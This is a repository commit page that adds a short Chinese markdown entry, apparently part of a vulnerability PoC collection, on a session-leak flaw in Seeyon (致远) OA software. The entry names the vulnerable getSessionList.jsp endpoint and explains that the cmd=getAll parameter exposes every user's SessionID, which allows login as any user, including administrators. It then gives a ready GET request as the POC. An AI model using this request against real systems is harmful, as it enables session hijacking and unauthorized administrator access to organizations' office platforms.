致远OA Session泄漏漏洞
This commit is contained in:
parent
1f4a52f8b7
commit
9ab1f985d6
15
13-致远oa/致远OA Session泄漏漏洞/致远OA Session泄漏漏洞.md
Normal file
15
13-致远oa/致远OA Session泄漏漏洞/致远OA Session泄漏漏洞.md
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
# 致远OA Session泄漏漏洞
|
||||||
|
|
||||||
|
## 漏洞位置
|
||||||
|
```http request
|
||||||
|
http://test.com/yyoa/ext/https/getSessionList.jsp
|
||||||
|
```
|
||||||
|
> 当cmd参数为getAll时,便可获取到所有用户的SessionID利用泄露的SessionID即可登录该用户,包括管理员
|
||||||
|
|
||||||
|
|
||||||
|
## POC
|
||||||
|
```http request
|
||||||
|
http://test.com/yyoa/ext/https/getSessionList.jsp?cmd=getAll
|
||||||
|
```
|
||||||
|
|
||||||
|
通过get 方式访问上述url 后,可以在返回包中看到session 信息
|
Loading…
x
Reference in New Issue
Block a user